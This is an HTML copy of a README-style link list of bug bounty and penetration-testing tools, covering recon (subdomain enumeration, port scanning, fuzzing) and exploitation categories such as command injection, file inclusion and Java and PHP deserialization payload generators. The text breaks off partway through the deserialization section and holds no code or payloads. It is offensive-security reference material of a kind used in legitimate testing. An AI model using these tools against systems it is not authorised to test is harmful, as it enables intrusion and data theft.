<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<div data-target="readme-toc.content" class="Box-body px-5 pb-5">
<h1>Tool for bug bounty in 2022</h1>
<pre>
Recon
  Subdomain Enumeration
  Port Scanning
  Technologies
  Content Discovery
  Links
  Parameters
  Fuzzing
Exploitation
  Command Injection
  CORS Misconfiguration
  CRLF Injection
  CSRF Injection
  Directory Traversal
  File Inclusion
  GraphQL Injection
  Header Injection
  Insecure Deserialization
  Insecure Direct Object References
  Open Redirect
  Race Condition
  Request Smuggling
  Server Side Request Forgery
  SQL Injection
  XSS Injection
  XXE Injection
Miscellaneous
  Passwords
  Secrets
  Git
  Buckets
  CMS
  JSON Web Token
  Subdomain Takeover
</pre>
<h2 dir="auto"><a id="user-content-recon" class="anchor" aria-hidden="true" href="recon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Recon</h2>
<h3 dir="auto"><a id="user-content-subdomain-enumeration" class="anchor" aria-hidden="true" href="subdomain-enumeration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Subdomain Enumeration</h3>
<ul dir="auto">
<li><a href="https://github.com/aboul3la/Sublist3r">Sublist3r</a> - Fast subdomains enumeration tool for penetration testers</li>
<li><a href="https://github.com/OWASP/Amass">Amass</a> - In-depth Attack Surface Mapping and Asset Discovery</li>
<li><a href="https://github.com/blechschmidt/massdns">massdns</a> - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)</li>
<li><a href="https://github.com/Findomain/Findomain">Findomain</a> - The fastest and cross-platform subdomain enumerator, do not waste your time.</li>
<li><a href="https://github.com/Screetsec/Sudomy">Sudomy</a> - Sudomy is a subdomain enumeration tool that collects subdomains and analyzes domains, performing automated reconnaissance (recon) for bug hunting / pentesting</li>
<li><a href="https://github.com/projectdiscovery/chaos-client">chaos-client</a> - Go client to communicate with Chaos DNS API.</li>
<li><a href="https://github.com/TypeError/domained">domained</a> - Multi Tool Subdomain Enumeration</li>
<li><a href="https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration">bugcrowd-levelup-subdomain-enumeration</a> - This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference</li>
<li><a href="https://github.com/projectdiscovery/shuffledns">shuffledns</a> - shuffleDNS is a wrapper around massdns written in go that allows you to enumerate valid subdomains using active bruteforce as well as resolve subdomains with wildcard handling and easy input-output…</li>
<li><a href="https://github.com/christophetd/censys-subdomain-finder">censys-subdomain-finder</a> - Perform subdomain enumeration using the certificate transparency logs from Censys.</li>
<li><a href="https://github.com/fleetcaptain/Turbolist3r">Turbolist3r</a> - Subdomain enumeration tool with analysis features for discovered domains</li>
<li><a href="https://github.com/0xbharath/censys-enumeration">censys-enumeration</a> - A script to extract subdomains/emails for a given domain using SSL/TLS certificate dataset on Censys</li>
<li><a href="https://github.com/LordNeoStark/tugarecon">tugarecon</a> - Fast subdomains enumeration tool for penetration testers.</li>
<li><a href="https://github.com/cinerieus/as3nt">as3nt</a> - Another Subdomain ENumeration Tool</li>
<li><a href="https://github.com/si9int/Subra">Subra</a> - A Web-UI for subdomain enumeration (subfinder)</li>
<li><a href="https://github.com/nexxai/Substr3am">Substr3am</a> - Passive reconnaissance/enumeration of interesting targets by watching for SSL certificates being issued</li>
<li><a href="https://github.com/jhaddix/domain/">domain</a> - enumall.py setup script for Recon-ng</li>
<li><a href="https://github.com/infosec-au/altdns">altdns</a> - Generates permutations, alterations and mutations of subdomains and then resolves them</li>
<li><a href="https://github.com/anshumanbh/brutesubs">brutesubs</a> - An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose</li>
<li><a href="https://github.com/lorenzog/dns-parallel-prober">dns-parallel-prober</a> - This is a parallelised domain name prober to find as many subdomains of a given domain as fast as possible.</li>
<li><a href="https://github.com/rbsec/dnscan">dnscan</a> - dnscan is a python wordlist-based DNS subdomain scanner.</li>
<li><a href="https://github.com/guelfoweb/knock">knock</a> - Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.</li>
<li><a href="https://github.com/hakluke/hakrevdns">hakrevdns</a> - Small, fast tool for performing reverse DNS lookups en masse.</li>
<li><a href="https://github.com/projectdiscovery/dnsx">dnsx</a> - Dnsx is a fast and multi-purpose DNS toolkit that allows running multiple DNS queries of your choice with a list of user-supplied resolvers.</li>
<li><a href="https://github.com/projectdiscovery/subfinder">subfinder</a> - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites.</li>
<li><a href="https://github.com/tomnomnom/assetfinder">assetfinder</a> - Find domains and subdomains related to a given domain</li>
<li><a href="https://github.com/nahamsec/crtndstry">crtndstry</a> - Yet another subdomain finder</li>
<li><a href="https://github.com/codingo/VHostScan">VHostScan</a> - A virtual host scanner that performs reverse lookups</li>
<li><a href="https://github.com/edoardottt/scilla">scilla</a> - Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration</li>
<li><a href="https://github.com/topics/subdomain-enumeration">for more tools</a></li>
</ul>
<h3 dir="auto"><a id="user-content-port-scanning" class="anchor" aria-hidden="true" href="port-scanning"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Port Scanning</h3>
<ul dir="auto">
<li><a href="https://github.com/robertdavidgraham/masscan">masscan</a> - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.</li>
<li><a href="https://github.com/RustScan/RustScan">RustScan</a> - The Modern Port Scanner</li>
<li><a href="https://github.com/projectdiscovery/naabu">naabu</a> - A fast port scanner written in go with focus on reliability and simplicity.</li>
<li><a href="https://github.com/nmap/nmap">nmap</a> - Nmap - the Network Mapper. Github mirror of official SVN repository.</li>
<li><a href="https://github.com/trimstray/sandmap">sandmap</a> - Nmap on steroids. Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles.</li>
<li><a href="https://github.com/johnnyxmas/ScanCannon">ScanCannon</a> - Combines the speed of masscan with the reliability and detailed enumeration of nmap</li>
<li><a href="https://github.com/topics/port-scanner">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-technologies" class="anchor" aria-hidden="true" href="technologies"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Technologies</h3>
<ul dir="auto">
<li><a href="https://github.com/AliasIO/wappalyzer">wappalyzer</a> - Identify technology on websites.</li>
<li><a href="https://github.com/rverton/webanalyze">webanalyze</a> - Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning.</li>
<li><a href="https://github.com/claymation/python-builtwith">python-builtwith</a> - BuiltWith API client</li>
<li><a href="https://github.com/urbanadventurer/whatweb">whatweb</a> - Next generation web scanner</li>
<li><a href="https://github.com/RetireJS/">RetireJS</a> - …</li>
</ul>
<hr>
<h3 dir="auto"><a id="user-content-content-discovery" class="anchor" aria-hidden="true" href="content-discovery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Content Discovery</h3>
<ul dir="auto">
<li><a href="https://github.com/OJ/gobuster">gobuster</a> - Directory/File, DNS and VHost busting tool written in Go</li>
<li><a href="https://github.com/C-Sto/recursebuster">recursebuster</a> - rapid content discovery tool for recursively querying webservers, handy in pentesting and web application assessments</li>
<li><a href="https://github.com/epi052/feroxbuster">feroxbuster</a> - A fast, simple, recursive content discovery tool written in Rust.</li>
<li><a href="https://github.com/maurosoria/dirsearch">dirsearch</a> - Web path scanner</li>
<li><a href="https://github.com/evilsocket/dirsearch">dirsearch</a> - A Go implementation of dirsearch.</li>
<li><a href="https://github.com/henshin/filebuster">filebuster</a> - An extremely fast and flexible web fuzzer</li>
<li><a href="https://github.com/stefanoj3/dirstalk">dirstalk</a> - Modern alternative to dirbuster/dirb</li>
<li><a href="https://github.com/digination/dirbuster-ng">dirbuster-ng</a> - dirbuster-ng is a C CLI implementation of the Java dirbuster tool</li>
<li><a href="https://github.com/jaeles-project/gospider">gospider</a> - Gospider - Fast web spider written in Go</li>
<li><a href="https://github.com/hakluke/hakrawler">hakrawler</a> - Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application</li>
</ul>
<h3 dir="auto"><a id="user-content-links" class="anchor" aria-hidden="true" href="links"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Links</h3>
<ul dir="auto">
<li><a href="https://github.com/GerbenJavado/LinkFinder">LinkFinder</a> - A python script that finds endpoints in JavaScript files</li>
<li><a href="https://github.com/zseano/JS-Scan">JS-Scan</a> - A .js scanner, built in PHP, designed to scrape URLs and other info</li>
<li><a href="https://github.com/arbazkiraak/LinksDumper">LinksDumper</a> - Extract (links/possible endpoints) from responses & filter them via decoding/sorting</li>
<li><a href="https://github.com/0xsha/GoLinkFinder">GoLinkFinder</a> - A fast and minimal JS endpoint extractor</li>
<li><a href="https://github.com/InitRoot/BurpJSLinkFinder">BurpJSLinkFinder</a> - Burp Extension for passive scanning of JS files for endpoint links.</li>
<li><a href="https://github.com/IAmStoxe/urlgrab">urlgrab</a> - A golang utility to spider through a website searching for additional links.</li>
<li><a href="https://github.com/tomnomnom/waybackurls">waybackurls</a> - Fetch all the URLs that the Wayback Machine knows about for a domain</li>
<li><a href="https://github.com/lc/gau">gau</a> - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.</li>
<li><a href="https://github.com/003random/getJS">getJS</a> - A tool to quickly get all JavaScript sources/files</li>
</ul>
<h3 dir="auto"><a id="user-content-parameters" class="anchor" aria-hidden="true" href="parameters"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Parameters</h3>
<ul dir="auto">
<li><a href="https://github.com/maK-/parameth">parameth</a> - This tool can be used to brute-force discover GET and POST parameters</li>
<li><a href="https://github.com/PortSwigger/param-miner">param-miner</a> - This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.</li>
<li><a href="https://github.com/Bo0oM/ParamPamPam">ParamPamPam</a> - This tool brute-force discovers GET and POST parameters.</li>
<li><a href="https://github.com/s0md3v/Arjun">Arjun</a> - HTTP parameter discovery suite.</li>
<li><a href="https://github.com/devanshbatham/ParamSpider">ParamSpider</a> - Mining parameters from dark corners of Web Archives</li>
</ul>
<h3 dir="auto"><a id="user-content-fuzzing" class="anchor" aria-hidden="true" href="fuzzing"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Fuzzing</h3>
<ul dir="auto">
<li><a href="https://github.com/xmendez/wfuzz">wfuzz</a> - Web application fuzzer</li>
<li><a href="https://github.com/ffuf/ffuf">ffuf</a> - Fast web fuzzer written in Go</li>
<li><a href="https://github.com/fuzzdb-project/fuzzdb">fuzzdb</a> - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.</li>
<li><a href="https://github.com/1N3/IntruderPayloads">IntruderPayloads</a> - A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.</li>
<li><a href="https://github.com/Bo0oM/fuzz.txt">fuzz.txt</a> - Potentially dangerous files</li>
<li><a href="https://github.com/googleprojectzero/fuzzilli">fuzzilli</a> - A JavaScript Engine Fuzzer</li>
<li><a href="https://github.com/Fuzzapi/fuzzapi">fuzzapi</a> - Fuzzapi is a tool used for REST API pentesting and uses the API_Fuzzer gem</li>
<li><a href="https://github.com/ameenmaali/qsfuzz">qsfuzz</a> - qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.</li>
<li><a href="https://github.com/d4rckh/vaf">vaf</a> - very advanced (web) fuzzer written in Nim.</li>
<li><a href="https://github.com/topics/fuzzing">for more tools</a></li>
</ul>
</div>
<h2 dir="auto"><a id="user-content-exploitation" class="anchor" aria-hidden="true" href="exploitation"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Exploitation</h2>
<h3 dir="auto"><a id="user-content-command-injection" class="anchor" aria-hidden="true" href="command-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Command Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/commixproject/commix">commix</a> - Automated All-in-One OS command injection and exploitation tool.</li>
<li><a href="https://github.com/topics/command-injection">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-cors-misconfiguration" class="anchor" aria-hidden="true" href="cors-misconfiguration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CORS Misconfiguration</h3>
<ul dir="auto">
<li><a href="https://github.com/s0md3v/Corsy">Corsy</a> - CORS Misconfiguration Scanner</li>
<li><a href="https://github.com/RUB-NDS/CORStest">CORStest</a> - A simple CORS misconfiguration scanner</li>
<li><a href="https://github.com/laconicwolf/cors-scanner">cors-scanner</a> - A multi-threaded scanner that helps identify CORS flaws/misconfigurations</li>
<li><a href="https://github.com/Shivangx01b/CorsMe">CorsMe</a> - Cross Origin Resource Sharing MisConfiguration Scanner</li>
<li><a href="https://github.com/topics/cors-scanner">for more tools</a></li>
</ul>
<h3 dir="auto"><a id="user-content-crlf-injection" class="anchor" aria-hidden="true" href="crlf-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CRLF Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/dwisiswant0/crlfuzz">crlfuzz</a> - A fast tool to scan CRLF vulnerability written in Go</li>
<li><a href="https://github.com/MichaelStott/CRLF-Injection-Scanner">CRLF-Injection-Scanner</a> - Command line tool for testing CRLF injection on a list of domains.</li>
<li><a href="https://github.com/BountyStrike/Injectus">Injectus</a> - CRLF and open redirect fuzzer</li>
<li><a href="https://github.com/topics/crlf">for more tools</a></li>
</ul>
<h3 dir="auto"><a id="user-content-csrf-injection" class="anchor" aria-hidden="true" href="csrf-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CSRF Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/0xInfection/XSRFProbe">XSRFProbe</a> - The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.</li>
<li><a href="https://github.com/topics/csrf-scanner">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-directory-traversal" class="anchor" aria-hidden="true" href="directory-traversal"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Directory Traversal</h3>
<ul dir="auto">
<li><a href="https://github.com/wireghoul/dotdotpwn">dotdotpwn</a> - DotDotPwn - The Directory Traversal Fuzzer</li>
<li><a href="https://github.com/chrispetrou/FDsploit">FDsploit</a> - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.</li>
<li><a href="https://github.com/bayotop/off-by-slash">off-by-slash</a> - Burp extension to detect alias traversal via NGINX misconfiguration at scale.</li>
<li><a href="https://github.com/momenbasel/liffier">liffier</a> - Tired of manually adding dot-dot-slash to your possible path traversal? This short snippet will increment ../ on the URL.</li>
<li><a href="https://github.com/topics/directory-traversal">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-file-inclusion" class="anchor" aria-hidden="true" href="file-inclusion"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>File Inclusion</h3>
<ul dir="auto">
<li><a href="https://github.com/mzfr/liffy">liffy</a> - Local file inclusion exploitation tool</li>
<li><a href="https://github.com/Team-Firebugs/Burp-LFI-tests">Burp-LFI-tests</a> - Fuzzing for LFI using Burpsuite</li>
<li><a href="https://github.com/mthbernardes/LFI-Enum">LFI-Enum</a> - Scripts to execute enumeration via LFI</li>
<li><a href="https://github.com/D35m0nd142/LFISuite">LFISuite</a> - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner</li>
<li><a href="https://github.com/hussein98d/LFI-files">LFI-files</a> - Wordlist to bruteforce for LFI</li>
<li><a href="https://github.com/topics/local-file-inclusion">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-graphql-injection" class="anchor" aria-hidden="true" href="graphql-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>GraphQL Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/doyensec/inql">inql</a> - InQL - A Burp Extension for GraphQL Security Testing</li>
<li><a href="https://github.com/swisskyrepo/GraphQLmap">GraphQLmap</a> - GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.</li>
<li><a href="https://github.com/szski/shapeshifter">shapeshifter</a> - GraphQL security testing tool</li>
<li><a href="https://github.com/zidekmat/graphql_beautifier">graphql_beautifier</a> - Burp Suite extension to help make Graphql request more readable</li>
<li><a href="https://github.com/nikitastupin/clairvoyance">clairvoyance</a> - Obtain GraphQL API schema despite disabled introspection!</li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-header-injection" class="anchor" aria-hidden="true" href="header-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Header Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/mlcsec/headi">headi</a> - Customisable and automated HTTP header injection.</li>
<li><a href="https://github.com/topics/host-header-injection">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-insecure-deserialization" class="anchor" aria-hidden="true" href="insecure-deserialization"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Insecure Deserialization</h3>
<ul dir="auto">
<li><a href="https://github.com/frohoff/ysoserial">ysoserial</a> - A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.</li>
<li><a href="https://github.com/BishopFox/GadgetProbe">GadgetProbe</a> - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.</li>
<li><a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a> - Deserialization payload generator for a variety of .NET formatters</li>
<li><a href="https://github.com/ambionics/phpggc">phpggc</a> - PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.</li>
